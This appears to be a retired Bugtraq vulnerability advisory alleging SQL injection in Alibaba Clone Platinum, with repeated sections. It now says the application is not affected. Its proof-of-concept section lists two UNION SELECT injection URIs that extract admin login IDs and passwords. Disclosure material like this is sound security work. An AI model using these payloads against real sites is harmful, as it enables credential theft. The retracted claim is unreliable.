RETIRED: Alibaba Clone Platinum Multiple SQL Injection Vulnerabilities
BID:40206
Info
RETIRED: Alibaba Clone Platinum Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 40206 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2010 12:00AM |
| Updated: | Jun 10 2010 04:29PM |
| Credit: | CoBRa_21; GuN |
| Vulnerable: |
Alibaba Clone Platinum Script 0 |
| Not Vulnerable: | |
Discussion
RETIRED: Alibaba Clone Platinum Multiple SQL Injection Vulnerabilities
Alibaba Clone Platinum is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RETIRED: Further information and analysis shows the application is not affected by this issue.
Alibaba Clone Platinum is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RETIRED: Further information and analysis shows the application is not affected by this issue.
Exploit / POC
RETIRED: Alibaba Clone Platinum Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/[patch]/buyer/index.php?ProductID=&BuyerID=-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
http://www.example.com/[path]/buyer/about_us.php?BuyerID=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28LoginID,0x3a,password%29,38,39,40%20from%20admin
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/[patch]/buyer/index.php?ProductID=&BuyerID=-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
http://www.example.com/[path]/buyer/about_us.php?BuyerID=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28LoginID,0x3a,password%29,38,39,40%20from%20admin
References
RETIRED: Alibaba Clone Platinum Multiple SQL Injection Vulnerabilities
References:
References:
- Alibaba Clone Platinum (Alibaba Clone)